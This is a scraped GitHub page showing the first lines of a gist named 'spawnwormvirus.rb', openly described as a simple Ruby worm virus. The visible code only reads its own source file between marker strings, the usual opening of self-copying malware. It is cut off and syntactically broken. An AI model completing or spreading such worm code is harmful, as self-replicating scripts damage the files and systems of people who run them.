Skip to content

Instantly share code, notes, and snippets.

View NikoSoft12's full-sized avatar

niko :) NikoSoft12

  • Your Hobbit hole.
View GitHub Profile
@thomasjslone
thomasjslone / spawnwormvirus.rb
Created September 14, 2016 01:33
Ruby worm virus at its most simple
##821123##
resdir = C:/Users/House/Desktop/spawnwormvirus.rb
begs = "##821" + "123##
ends = "##964" + "525##
$malicious = false
file = File.open(resdir,"r")
filec = file.read.to_s
file.close
str1 = begs.to_s
str2 = ends.to_s